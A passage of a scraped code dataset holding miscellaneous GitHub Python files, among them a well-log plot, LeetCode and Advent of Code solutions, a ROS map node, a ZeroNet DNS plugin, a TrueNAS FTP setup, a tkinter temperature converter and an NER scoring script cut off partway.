color='lime', linewidth=0)\r\ncbar = plt.colorbar(im, ax=ax[3])\r\ncbar.set_label('0=undef,1=brine,2=oil,3=gas,4=shale')\r\ncbar.set_ticks(range(0,4+1)); cbar.set_ticklabels(range(0,4+1))\r\ncbar.set_label((12*' ').join(['undef', 'ss brine', 'ss oil', 'ss gas', 'shale']))\r\ncbar.set_ticks(range(0,1)); cbar.set_ticklabels('')\r\n\r\nfor i in range(len(ax)-1):\r\n ax[i].set_ylim(ztop,zbot)\r\n ax[i].invert_yaxis()\r\n ax[i].grid()\r\n ax[i].locator_params(axis='x', nbins=4)\r\nax[0].legend(fontsize='small', loc='lower right')\r\nax[0].set_xlabel(\"Vcl & Sw\"), ax[0].set_xlim(-.1,1.1)\r\nax[1].set_xlabel(\"Density & Nphi\")\r\nax[2].set_xlabel(\"Vp/Vs\"),\r\nax[3].set_xlabel('LFC')\r\nax[1].set_yticklabels([]); ax[2].set_yticklabels([]); ax[3].set_yticklabels([]); ax[3].set_xticklabels([])\r\n\r\nplt.show()","repo_name":"SWahidatulhusna/Fluid-Replacement-Model-Rock-Physics","sub_path":"WELLFACIESPREPROS.py","file_name":"WELLFACIESPREPROS.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"25431787628","text":"\n\ndef get_input(filename):\n with open(filename) as file:\n lines = file.read().splitlines()\n return int(lines[0]), [int(value) for value in lines[1].split(',') if value.isdigit()]\n\n\ndef main():\n earliest, codes = get_input('input.txt')\n delta = max(codes)\n mods = [code - earliest % code for code in codes]\n best = codes[mods.index(min(mods))]\n print(best * min(mods))\n # value = codes[]\n # print(codes)\n\n\nmain()\n","repo_name":"zackjohnson298/AdventOfCode","sub_path":"2020/Day13/Part1.py","file_name":"Part1.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"41807434405","text":"\"\"\"\n A simple python script that contains all the helper/util functions. This functions can be used by other scripts.\n\"\"\"\nimport json\nimport os\nimport csv\nfrom operator import itemgetter\nfrom datetime import datetime\n\ndef loadAndConvertJSONData(fname):\n\t\"\"\"\n\t This function reads a json file as input and convert it to a python object. It returns a list of dictionaries\n\t\"\"\"\n\tpyDataList=[]\n\tfile=open(fname)\n\tfor jsonText in file:\n\t\tjsonToPy=json.loads(jsonText)\n\t\tpyDataList.append(jsonToPy)\n\tfile.close()\n\treturn pyDataList\n\ndef convertPyToJson(pyData):\n\t\"\"\"\n\t This function takes a python object (List, Dict, Set, Boolean, String, Integer) and returns an equivalent json object \n\t\"\"\"\n\treturn json.dumps(pyData)\n\ndef getAbsFileName(fname):\n\tfileAbsPath=os.path.abspath(fname)\n\treturn fileAbsPath\n\ndef convertToCSV(dataList, fname):\n\tkey=[]\n\tf = csv.writer(open(fname+\".csv\", \"w\"))\n\t\n\t#Write CSV Header, If you dont need that, remove this line\n\tfor k in dataList[0].keys():\n\t\tkey.append(k)\n\tf.writerow(key)\n\n\t#Write the data to csv\n\tfor dataDict in dataList:\n\t\tvalue=[]\n\t\tfor v in dataDict.values():\n\t\t\tvalue.append(v)\n\t\tf.writerow(value)\n\tprint(fname+\".csv\", \"successfully created\")\n \n\ndef sortValuesDesc(dataDict, k):\n\t\"\"\"\n\t\tsort the dictionary by value, in descending order and return the k top records\n\t\"\"\"\n\tsortedByValue=sorted(dataDict.items(),key=itemgetter(1),reverse=True)\n\treturn sortedByValue[:k] # return the top k terms and their frequencies\n\ndef calculateAverage(T,C):\n\treturn T/C\n\ndef writeDataToJSON(fname, headers, data):\n\t\n\tf = csv.writer(open(fname+\".csv\", \"w\"))\n\t\n\t#Write CSV Header, If you dont need that, remove this line\n\tf.writerow(headers)\n\n\t#Write the data to csv\n\tfor rec in data:\n\t\tf.writerow(rec)\n\n\tprint(fname+\".csv\", \"successfully created\")\n\t\ndef bucketedDate(dateStr, bucket):\n\tformate=\"%Y-%m-%d\"\n\tdateObj=datetime.strptime(dateStr, formate)\n\tbucketType={'day': dateObj.day, 'month': dateObj.month, 'year': dateObj.year, 'quarter': quarter(dateObj), 'semester': semester(dateObj)}\n\treturn bucketType[bucket]\n\ndef quarter(dateObj):\n\t\"\"\" \n\t\tWrong Implementation\n\t\"\"\"\n\tyear=dateObj.year\n\tmonth=dateObj.month\n\tif 1<= month <= 3:\n\t\treturn str(year)+'-Q1'\n\telif 4<= month <=6:\n\t\treturn str(year)+'-Q2'\n\telif 7<= month <=9:\n\t\treturn str(year)+'-Q3'\n\telif 10<= month <=12:\n\t\treturn str(year)+'-Q4'\n\telse:\n\t\treturn \"ERROR - Invalid quarter\"\n\ndef semester(dateObj):\n\t\"\"\"\n\t\tWrong Implementation\n\t\"\"\"\n\tyear=dateObj.year\n\tmonth=dateObj.month\n\tif 1<= month <= 4:\n\t\treturn str(year)+'-S1'\n\telif 5<= month <=8:\n\t\treturn str(year)+'-S2'\n\telif 9<= month <=12:\n\t\treturn str(year)+'-S3'\n\telse:\n\t\treturn \"ERROR - Invalid semester\"\n\n","repo_name":"mehulgupta29/YelpDataChallenge","sub_path":"scripts/old_scripts/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"10972604623","text":"class Solution:\n # A method of splitting an integer into its contituent digits and returns\n # them as a list. From some testing, it seems to be slower than the string\n # conversion method below. On the other hand, this is probably more\n # portable as not every language lets you swap between strings and ints\n # so easily\n def int_split(self, num: int) -> list:\n units = []\n digit = 10\n while num != 0:\n temp = num % digit\n num -= temp\n temp = temp / (digit / 10)\n units.append(int(temp))\n digit *= 10\n return units\n\n def split_sum(self, num: int) -> int:\n temp = list(str(num))\n for i in range(len(temp)):\n x = int(temp[i])\n temp[i] = x * x\n return sum(temp)\n\n def isHappy(self, n: int) -> bool:\n values = []\n while n not in values:\n values.append(n)\n n = self.split_sum(n)\n if n == 1:\n return True\n return False\n","repo_name":"adubois85/coding_challenge_websites","sub_path":"LeetCode/1-1000/201-300/201-225/202. Happy Number/solution-python.py","file_name":"solution-python.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"4899985936","text":"import config\n\n\nclass Command:\n \"\"\"\n Command superclass, defining how a command should be structured.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"\n Three values should be initialized during initialization.\n :param name: A string detailing which section of the localization file contains the command text.\n \"\"\"\n self.name = name\n self.call = config.localization[self.name]['commands']\n self.description = config.localization[self.name]['description']\n if 'parameters' in config.localization[self.name]:\n self.parameters = config.localization[self.name]['parameters']\n else:\n self.parameters = config.localization['no_params']\n # self.call = call\n # self.description = description\n # self.parameters = parameters\n\n def __str__(self):\n \"\"\"\n As a string, the command should give an explanation of how to call it, what parameters it takes,\n and a description of what it does.\n \"\"\"\n return config.localization['command_skeleton'].format(self.get_call_string(),\n self.description,\n self.parameters)\n\n def get_call_string(self):\n \"\"\"\n Helper method to convert the call list to a string.\n :return: A string containing the list of possible calls the command responds to.\n \"\"\"\n result = \"\"\n for item in self.call:\n if result:\n result += \", \"\n result += config.configuration['sign'] + item\n return result\n\n def in_call(self, command):\n \"\"\"\n Method for determining if a specific string would trigger this command. Can be overwritten.\n :param command:\n :return:\n \"\"\"\n return command in self.call\n\n def execute(self, param, message, system):\n \"\"\"\n Method to be implemented by the class. Executes the actual command when it's calledw.\n :param param: The parameters given by the user.\n :param message: The message meta-data, including who sent the command.\n :param system: The system object, for accessing different managers.\n :return:\n \"\"\"\n raise NotImplementedError\n","repo_name":"LogicalFish/DiscordBot","sub_path":"python/commands/command_superclass.py","file_name":"command_superclass.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"8515935046","text":"from typing import List\n\n\nclass Solution(object):\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n for i in range(len(nums) - 1):\n for j in range(i + 1, len(nums)):\n if nums[i] + nums[j] == target:\n return [i, j]\n\n def twoSum_hashTable(self, nums: List[int], target: int) -> List[int]:\n hashmap = {}\n for i in range(len(nums)):\n complement = target - nums[i]\n if complement in hashmap:\n return sorted([i, hashmap[complement]])\n hashmap[nums[i]] = i\n\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.twoSum(nums=[2, 7, 11, 15], target=9))\n print(sol.twoSum(nums=[3, 2, 4], target=6))\n print(sol.twoSum(nums=[3, 3], target=6))\n print(sol.twoSum_hashTable(nums=[2, 7, 11, 15], target=9))\n print(sol.twoSum_hashTable(nums=[3, 2, 4], target=6))\n print(sol.twoSum_hashTable(nums=[3, 3], target=6))\n","repo_name":"Engineering-Excellence/Problem-Solving","sub_path":"LeetCode/src/easy/py/LeetCode_1_TwoSum.py","file_name":"LeetCode_1_TwoSum.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"37713343084","text":"import dataclasses\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\nimport jax\nimport mujoco\nfrom mujoco import mjx\nfrom mujoco.mjx._src import test_util\n# pylint: disable=g-importing-member\nfrom mujoco.mjx._src.types import Contact\n# pylint: enable=g-importing-member\nimport numpy as np\n\n\ndef _assert_attr_eq(mjx_d, mj_d, attr, name, atol):\n if attr == 'efc_address':\n # we do not test efc_address since it gets set in constraint logic\n return\n err_msg = f'mismatch: {attr} in run: {name}'\n mjx_d, mj_d = getattr(mjx_d, attr), getattr(mj_d, attr)\n if attr == 'frame':\n mj_d = mj_d.reshape((-1, 3, 3))\n if mjx_d.shape != mj_d.shape:\n raise AssertionError(f'{attr} shape mismatch: {mjx_d.shape}, {mj_d.shape}')\n np.testing.assert_allclose(mjx_d, mj_d, err_msg=err_msg, atol=atol)\n\n\nclass CollisionDriverIntegrationTest(parameterized.TestCase):\n\n @parameterized.parameters(list(range(256)))\n def test_collision_driver(self, seed):\n enable_contact = False if seed == 0 else True\n mjcf = test_util.create_mjcf(\n seed,\n body_pos=(0.0, 0.0, 0.14),\n disable_actuation_pct=100,\n root_always_free=True,\n min_trees=1,\n max_trees=5,\n max_tree_depth=1,\n enable_contact=enable_contact,\n )\n\n m = mujoco.MjModel.from_xml_string(mjcf)\n mx = mjx.device_put(m)\n d = mujoco.MjData(m)\n dx = mjx.device_put(d)\n\n mujoco.mj_step(m, d)\n collision_jit_fn = jax.jit(mjx.collision)\n kinematics_jit_fn = jax.jit(mjx.kinematics)\n dx = kinematics_jit_fn(mx, dx)\n dx = collision_jit_fn(mx, dx)\n\n if not d.contact.geom1.shape[0]:\n self.assertTrue((dx.contact.dist > 0).all())\n return # no contacts to test\n\n # re-order MJX contacts to match MJ order\n idx_mj = list(zip(d.contact.geom1, d.contact.geom2))\n idx_mjx = list(zip(dx.contact.geom1, dx.contact.geom2))\n idx_mjx = [tuple(np.array(i)) for i in idx_mjx]\n self.assertSequenceEqual(set(idx_mjx), set(idx_mj))\n idx = sorted(range(len(idx_mj)), key=lambda x: idx_mj.index(idx_mjx[x]))\n\n mjx_contact = jax.tree_map(\n lambda x: x.take(np.array(idx), axis=0), dx.contact\n )\n mjx_contact = mjx_contact.replace(dim=mjx_contact.dim[idx])\n for field in dataclasses.fields(Contact):\n _assert_attr_eq(mjx_contact, d.contact, field.name, seed, 1e-7)\n\n\nif __name__ == '__main__':\n absltest.main()\n","repo_name":"deepmind/mujoco","sub_path":"mjx/mujoco/mjx/integration_test/collision_driver_test.py","file_name":"collision_driver_test.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":5900,"dataset":"github-code","pt":"20"} +{"seq_id":"69794044211","text":"#!/usr/bin/python3\n\nimport rospy\nimport time\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import LaserScan\nfrom fremenarray.msg import FremenArrayActionGoal, FremenArrayGoal, FremenArrayAction\nfrom geometry_msgs.msg import PoseArray, PointStamped\nfrom tf.transformations import euler_from_quaternion, quaternion_from_euler\nfrom nav_msgs.msg import OccupancyGrid\nimport actionlib\nimport math\nimport numpy as np\nimport tf\nfrom stefmap_ros.msg import STeFMapMsg,STeFMapCellMsg\nfrom stefmap_ros.srv import GetSTeFMap, UpdateSTeFMap\n\nclass STeFmap_node_offline(object):\n\n\tdef __init__(self):\n\t\t#parameters\n\t\tself.grid_size = rospy.get_param('~grid_size',1)#meters\t\t\n\t\tself.x_min = rospy.get_param('~x_min',-50)#meters\n\t\tself.x_max = rospy.get_param('~x_max',50) #meters\n\t\tself.y_min = rospy.get_param('~y_min',-50)#meters\n\t\tself.y_max = rospy.get_param('~y_max',50) #meters\n\t\tself.num_bins = rospy.get_param('~num_bins',8) #bins dividing the circumference\n\t\tself.frame_id = rospy.get_param('~frame_id',\"/map\")\n\n\t\t# initialize visibility map\n\t\tself.width = int((self.x_max-self.x_min)/self.grid_size) ## [cells]\n\t\tself.height = int((self.y_max-self.y_min)/self.grid_size) ## [cells]\n\n\t\t# connect to fremenarray\n\t\trospy.loginfo(\"waiting for FremenArray.....\")\n\t\tself.fremenarray_client = actionlib.SimpleActionClient('/fremenarray', FremenArrayAction)\n\t\tself.fremenarray_client.wait_for_server()\n\t\trospy.loginfo(\"FremenArray ready!\")\n\n\t\t# initiliatize stefmap\n\t\trospy.loginfo(\"Initializing STeF-map.....\")\n\t\tself.bin_counts_matrix = np.ones([self.width,self.height,self.num_bins])*-1 #initialize cells as unexplored/unknow\n\t\tself.bin_counts_matrix_accumulated = np.zeros([self.width,self.height,self.num_bins])\n\t\tself.entropy_map_store = []\n\n\t\t# create stef map service and topic\n\t\tget_stefmap_service = rospy.Service('get_stefmap', GetSTeFMap, self.handle_GetSTeFMap)\n\t\tself.stefmap_pub = rospy.Publisher('/stefmap', STeFMapMsg, queue_size=1, latch=True)\n\n\t\tself.run()\n\n\tdef handle_GetSTeFMap(self,req):\n\t\tmSTefMap = STeFMapMsg()\n\t\tmSTefMap.header.stamp = rospy.get_rostime() \n\t\tmSTefMap.header.frame_id = self.frame_id\n\t\tmSTefMap.prediction_time = req.prediction_time\n\t\tmSTefMap.x_min = self.x_min\n\t\tmSTefMap.x_max = self.x_max\n\t\tmSTefMap.y_min = self.y_min\n\t\tmSTefMap.y_max = self.y_max\n\t\tmSTefMap.cell_size = self.grid_size\n\t\tmSTefMap.rows = self.width\n\t\tmSTefMap.columns = self.height\n\n\t\tprint(\"STeFMap sent!\")\n\t\treturn mSTefMap\n\n\tdef run(self):\t\t\t\t\n\t\trospy.spin()\n\nif __name__ == '__main__':\n\trospy.init_node('stefmap_node', anonymous=True)\n\tstef = STeFmap_node_offline()\n","repo_name":"OrebroUniversity/mod_ros","sub_path":"stefmap_ros/src/stefmap_node_dummy.py","file_name":"stefmap_node_dummy.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"25272276094","text":"import os\n\nfrom middlewared.utils import osc\n\n\ndef setup(middleware):\n ftp = middleware.call_sync(\"ftp.config\")\n\n os.makedirs(\"/var/log/proftpd\", exist_ok=True)\n os.makedirs(\"/var/run/proftpd\", exist_ok=True)\n\n open(\"/var/run/proftpd/proftpd.delay\", \"w+\").close()\n open(\"/etc/hosts.allow\", \"w+\").close()\n open(\"/etc/hosts.deny\", \"w+\").close()\n\n if osc.IS_LINUX:\n filters = [[\"builtin\", \"=\", True], [\"username\", \"!=\", \"ftp\"]]\n if ftp[\"rootlogin\"]:\n filters.append([\"username\", \"!=\", \"root\"])\n\n ftpusers = [user[\"username\"] for user in middleware.call_sync(\"user.query\", filters)]\n\n with open(\"/etc/ftpusers\", \"w\") as f:\n f.write(\"\\n\".join(ftpusers) + \"\\n\")\n\n open(\"/var/log/wtmp\", \"w+\").close()\n os.chmod(\"/var/log/wtmp\", 0o644)\n\n with open(\"/var/run/proftpd/proftpd.motd\", \"w\") as f:\n if ftp[\"banner\"]:\n f.write(ftp[\"banner\"] + \"\\n\")\n else:\n product_name = middleware.call_sync(\"system.product_name\")\n f.write(f\"Welcome to {product_name} FTP Server\\n\")\n\n\ndef render(service, middleware):\n setup(middleware)\n","repo_name":"truenas/middleware","sub_path":"src/middlewared/middlewared/etc_files/local/proftpd.py","file_name":"proftpd.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":2144,"dataset":"github-code","pt":"20"} +{"seq_id":"1516321107","text":"from collections import defaultdict\ndef rod(num, x):\n if num % x == 0:\n return num//x\n else:\n return (num//x) + 1\n\ndef solution(fees, records):\n answer = []\n park_sum = defaultdict(int)\n park = dict()\n for r in records:\n t, n, h = r.split()\n\n if h == \"IN\":\n park[n] = t\n elif h == \"OUT\":\n time = (int(t[:2]) - int(park[n][:2])) * 60 + (int(t[-2:]) - int(park[n][-2:]))\n park_sum[n] += time\n del park[n]\n if park:\n for k, v in park.items():\n time = (23 - int(v[:2])) * 60 + (59 - int(v[-2:]))\n park_sum[k] += time\n numbers = sorted(list(park_sum.keys()))\n park_ssum = {k: park_sum[k] for k in numbers}\n for n, t in park_ssum.items():\n if t <= fees[0]:\n answer.append(fees[1])\n else:\n fee = fees[1] + rod((t- fees[0]), fees[2])*fees[3]\n answer.append((fee))\n return answer","repo_name":"potatowon/codingtest","sub_path":"프로그래머스/lv2/92341. 주차 요금 계산/주차 요금 계산.py","file_name":"주차 요금 계산.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"20838160795","text":"import logging, json, os, re, sys, time\nimport gevent\nfrom Plugin import PluginManager\nfrom Config import config\nfrom util import Http\nfrom Debug import Debug\n\nallow_reload = False # No reload supported\n\nlog = logging.getLogger(\"DnschainPlugin\")\n\n@PluginManager.registerTo(\"SiteManager\")\nclass SiteManagerPlugin(object):\n\tdns_cache_path = \"%s/dns_cache.json\" % config.data_dir\n\tdns_cache = None\n\n\t# Checks if its a valid address\n\tdef isAddress(self, address):\n\t\tif self.isDomain(address): \n\t\t\treturn True\n\t\telse:\n\t\t\treturn super(SiteManagerPlugin, self).isAddress(address)\n\n\n\t# Return: True if the address is domain\n\tdef isDomain(self, address):\n\t\treturn re.match(r\"(.*?)([A-Za-z0-9_-]+\\.[A-Za-z0-9]+)$\", address)\n\n\n\t# Load dns entries from data/dns_cache.json\n\tdef loadDnsCache(self):\n\t\tif os.path.isfile(self.dns_cache_path):\n\t\t\tself.dns_cache = json.load(open(self.dns_cache_path))\n\t\telse:\n\t\t\tself.dns_cache = {}\n\t\tlog.debug(\"Loaded dns cache, entries: %s\" % len(self.dns_cache))\n\n\n\t# Save dns entries to data/dns_cache.json\n\tdef saveDnsCache(self):\n\t\tjson.dump(self.dns_cache, open(self.dns_cache_path, \"wb\"), indent=2)\n\n\n\t# Resolve domain using dnschain.net\n\t# Return: The address or None\n\tdef resolveDomainDnschainNet(self, domain):\n\t\ttry:\n\t\t\tmatch = self.isDomain(domain)\n\t\t\tsub_domain = match.group(1).strip(\".\")\n\t\t\ttop_domain = match.group(2)\n\t\t\tif not sub_domain: sub_domain = \"@\"\n\t\t\taddress = None\n\t\t\twith gevent.Timeout(5, Exception(\"Timeout: 5s\")):\n\t\t\t\tres = Http.get(\"https://api.dnschain.net/v1/namecoin/key/%s\" % top_domain).read()\n\t\t\t\tdata = json.loads(res)[\"data\"][\"value\"]\n\t\t\t\tif \"zeronet\" in data:\n\t\t\t\t\tfor key, val in data[\"zeronet\"].items():\n\t\t\t\t\t\tself.dns_cache[key+\".\"+top_domain] = [val, time.time()+60*60*5] # Cache for 5 hours\n\t\t\t\t\tself.saveDnsCache()\n\t\t\t\t\treturn data[\"zeronet\"].get(sub_domain)\n\t\t\t# Not found\n\t\t\treturn address\n\t\texcept Exception as err:\n\t\t\tlog.debug(\"Dnschain.net %s resolve error: %s\" % (domain, Debug.formatException(err)))\n\n\n\t# Resolve domain using dnschain.info\n\t# Return: The address or None\n\tdef resolveDomainDnschainInfo(self, domain):\n\t\ttry:\n\t\t\tmatch = self.isDomain(domain)\n\t\t\tsub_domain = match.group(1).strip(\".\")\n\t\t\ttop_domain = match.group(2)\n\t\t\tif not sub_domain: sub_domain = \"@\"\n\t\t\taddress = None\n\t\t\twith gevent.Timeout(5, Exception(\"Timeout: 5s\")):\n\t\t\t\tres = Http.get(\"https://dnschain.info/bit/d/%s\" % re.sub(r\"\\.bit$\", \"\", top_domain)).read()\n\t\t\t\tdata = json.loads(res)[\"value\"]\n\t\t\t\tfor key, val in data[\"zeronet\"].items():\n\t\t\t\t\tself.dns_cache[key+\".\"+top_domain] = [val, time.time()+60*60*5] # Cache for 5 hours\n\t\t\t\tself.saveDnsCache()\n\t\t\t\treturn data[\"zeronet\"].get(sub_domain)\n\t\t\t# Not found\n\t\t\treturn address\n\t\texcept Exception as err:\n\t\t\tlog.debug(\"Dnschain.info %s resolve error: %s\" % (domain, Debug.formatException(err)))\n\n\n\t# Resolve domain\n\t# Return: The address or None\n\tdef resolveDomain(self, domain):\n\t\tdomain = domain.lower()\n\t\tif self.dns_cache == None:\n\t\t\tself.loadDnsCache()\n\t\tif domain.count(\".\") < 2: # Its a topleved request, prepend @. to it\n\t\t\tdomain = \"@.\"+domain\n\n\t\tdomain_details = self.dns_cache.get(domain)\n\t\tif domain_details and time.time() < domain_details[1]: # Found in cache and its not expired\n\t\t\treturn domain_details[0]\n\t\telse:\n\t\t\t# Resovle dns using dnschain\n\t\t\tthread_dnschain_info = gevent.spawn(self.resolveDomainDnschainInfo, domain)\n\t\t\tthread_dnschain_net = gevent.spawn(self.resolveDomainDnschainNet, domain)\n\t\t\tgevent.joinall([thread_dnschain_net, thread_dnschain_info]) # Wait for finish\n\n\t\t\tif thread_dnschain_info.value and thread_dnschain_net.value: # Booth successfull\n\t\t\t\tif thread_dnschain_info.value == thread_dnschain_net.value: # Same returned value\n\t\t\t\t\treturn thread_dnschain_info.value \n\t\t\t\telse:\n\t\t\t\t\tlog.error(\"Dns %s missmatch: %s != %s\" % (domain, thread_dnschain_info.value, thread_dnschain_net.value))\n\n\t\t\t# Problem during resolve\n\t\t\tif domain_details: # Resolve failed, but we have it in the cache\n\t\t\t\tdomain_details[1] = time.time()+60*60 # Dont try again for 1 hour\n\t\t\t\treturn domain_details[0]\n\t\t\telse: # Not found in cache\n\t\t\t\tself.dns_cache[domain] = [None, time.time()+60] # Don't check again for 1 min\n\t\t\t\treturn None\n\n\n\t# Return or create site and start download site files\n\t# Return: Site or None if dns resolve failed\n\tdef need(self, address, all_file=True):\n\t\tif self.isDomain(address): # Its looks like a domain\n\t\t\taddress_resolved = self.resolveDomain(address)\n\t\t\tif address_resolved:\n\t\t\t\taddress = address_resolved\n\t\t\telse:\n\t\t\t\treturn None\n\t\t\n\t\treturn super(SiteManagerPlugin, self).need(address, all_file)\n\n\n\t# Return: Site object or None if not found\n\tdef get(self, address):\n\t\tif self.sites == None: # Not loaded yet\n\t\t\tself.load()\n\t\tif self.isDomain(address): # Its looks like a domain\n\t\t\taddress_resolved = self.resolveDomain(address)\n\t\t\tif address_resolved: # Domain found\n\t\t\t\tsite = self.sites.get(address_resolved)\n\t\t\t\tif site:\n\t\t\t\t\tsite_domain = site.settings.get(\"domain\")\n\t\t\t\t\tif site_domain != address:\n\t\t\t\t\t\tsite.settings[\"domain\"] = address\n\t\t\telse: # Domain not found\n\t\t\t\tsite = self.sites.get(address)\n\n\t\telse: # Access by site address\n\t\t\tsite = self.sites.get(address)\n\t\treturn site\n\n","repo_name":"HelloZeroNet/ZeroNet","sub_path":"plugins/disabled-Dnschain/SiteManagerPlugin.py","file_name":"SiteManagerPlugin.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","stars":18056,"dataset":"github-code","pt":"20"} +{"seq_id":"223350997","text":"# -*- coding: utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nimport json\nimport glob\nimport geocoder\n\nfileList = glob.glob('html/tokyo/*.html')\n\njsonData = []\n# fileList = ['html/tokyo/data271.html']\nfor html in fileList:\n f = open(html, 'r')\n soup = BeautifulSoup(f.read(), \"lxml\")\n f.close()\n\n\n rawDartslive = soup.select(\".icn-shop-no\")\n if rawDartslive:\n dartslive = rawDartslive[0].text.replace('台', '')\n else:\n dartslive = 0\n\n name = soup.select(\".shop-info dl dd\")[0].text\n\n rawInformation = soup.select(\".shopInfo-txt-area p\")\n if rawInformation:\n information = rawInformation[0].text\n else:\n information = ''\n\n address = ''\n tel = ''\n station = ''\n time = ''\n holiday = ''\n url = ''\n tableColumns = soup.select(\"div.shopAccess table tr\")\n for tr in tableColumns:\n th = tr.select(\"th\")[0].text\n td = ' '.join(tr.select(\"td\")[0].text.split())\n if th == '住所':\n address = td\n elif th == '電話':\n tel = td\n elif th == '最寄駅':\n station = td\n elif th == '営業時間':\n time = td\n elif th == '定休日':\n holiday = td\n elif th == 'URL':\n url = td\n\n ret = geocoder.google(address).latlng\n if ret:\n latitude, longitude = ret\n else:\n latitude, longitude = [0, 0]\n print(name)\n\n data = {\n 'name': name,\n 'address': address,\n 'tel': tel,\n 'station': station,\n 'time': time,\n 'holiday': holiday,\n 'url': url,\n 'latitude': latitude,\n 'longitude': longitude,\n 'dartslive': dartslive,\n 'information': information\n }\n\n jsonData.append(data)\n\njsonFile = open('json/tokyo_shop.json', 'w')\njson.dump(jsonData, jsonFile)\njsonFile.close()\n","repo_name":"okadakk/darts","sub_path":"scraping/parseShop.py","file_name":"parseShop.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"22896866215","text":"from django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name=\"liabilities\"),\n path(\"add/\", views.add, name=\"liability_add\"),\n path(\"/\", views.detail, name=\"liability_detail\"),\n path(\"/change/\", views.change, name=\"liability_change\"),\n path(\"/delete/\", views.delete, name=\"liability_delete\"),\n\n path(\"creditors/\", include('liabilities.urls_creditors')),\n path(\"withdrawals/\", include('liabilities.urls_withdrawals')),\n]","repo_name":"Paphra/zacchaeus","sub_path":"liabilities/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"19535662707","text":"import tkinter as tk\r\n\r\ndef conv_c2f(temp_c):\r\n return temp_c * 1.8 + 32\r\n\r\n\r\ndef c2f():\r\n print(\"clicked!!\")\r\n # 섭씨를 화씨로...\r\n # 섭씨는...? 입력값은 어디??\r\n # giu_input() 비슷\r\n temp_c = float(ent_temp.get())\r\n temp_f = conv_c2f(temp_c)\r\n print(temp_f)\r\n # 결과는 어디다가 표시??\r\n lbl_result.config(text=f\"{temp_f:.1f}\")\r\n\r\n\r\nwindow = tk.Tk()\r\n\r\nent_frame = tk.Frame(master=window)\r\n\r\nent_temp = tk.Entry(master=ent_frame, width=10)\r\nlbl_temp_c = tk.Label(master=ent_frame, text=\"\\N{DEGREE CELSIUS}\")\r\nbtn_temp = tk.Button(master=ent_frame,\r\n text=\"\\N{RIGHTWARDS BLACK ARROW}\",\r\n command=c2f\r\n )\r\nlbl_result = tk.Label(master=ent_frame, text=\"!!!\")\r\n\r\n\r\ndef main():\r\n\r\n window.title(\"온도 변환 프로그램 v.0.1 by 홍길동\")\r\n window.resizable(width=False, height=False)\r\n window.geometry(\"500x300\")\r\n\r\n\r\n ent_temp.grid(row=0, column=0, sticky=\"e\")\r\n lbl_temp_c.grid(row=0, column=1)\r\n btn_temp.grid(row=0, column=2)\r\n lbl_result.grid(row=0, column=3)\r\n\r\n ent_frame.grid(row=0, column=0, padx=10, pady=10)\r\n\r\n\r\n\r\n window.mainloop()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Yanghuiwon22/ppp-hannah","sub_path":"homework19/ex2_temp_conv.py","file_name":"ex2_temp_conv.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"27018357696","text":"# -*- coding: utf-8 -*-\nimport sys\n\nimport numpy as np\n\n\ndef lines_to_label_list(input_lines):\n label_list = []\n label = []\n for line in input_lines:\n if len(line) < 2:\n if len(label) > 0:\n label_list.append(label)\n label = []\n else:\n label.append(line.strip().split()[-1])\n return label_list\n\n\n## compare two files by f1-value, input file should be .ann file \n## with format [@word1#entity-type*]word2 word3 ...\n## support nested entity (only use the largest span)\n## already remove segmentation space, i.e. character based entity extraction (to avoid segmentation mismatch problem on two files)\ndef compare_files(gold_file, pred_file, up_ignore_layer=0):\n # print \"Compare files...\"\n # print \"Gold file:\", gold_file\n # print \"Pred file:\", pred_file\n gold_entity, pred_entity, match_entity = get_matched_ner_from_file(gold_file, pred_file, up_ignore_layer)\n\n match_num = len(match_entity)\n gold_num = len(gold_entity)\n pred_num = len(pred_entity)\n return get_final_score(gold_num, pred_num, match_num)\n\n\ndef get_final_score(gold_num, pred_num, match_num):\n if pred_num == 0:\n precision = \"Nan\"\n else:\n precision = (match_num + 0.0) / pred_num\n if gold_num == 0:\n recall = 'Nan'\n else:\n recall = (match_num + 0.0) / gold_num\n if (precision == \"Nan\") or (recall == \"Nan\") or (precision + recall) <= 0.0:\n f_measure = \"Nan\"\n else:\n f_measure = 2 * precision * recall / (precision + recall)\n # print(('Precision: %s/%s = %s')%(match_num, pred_num, precision))\n # print(('Recall: %s/%s = 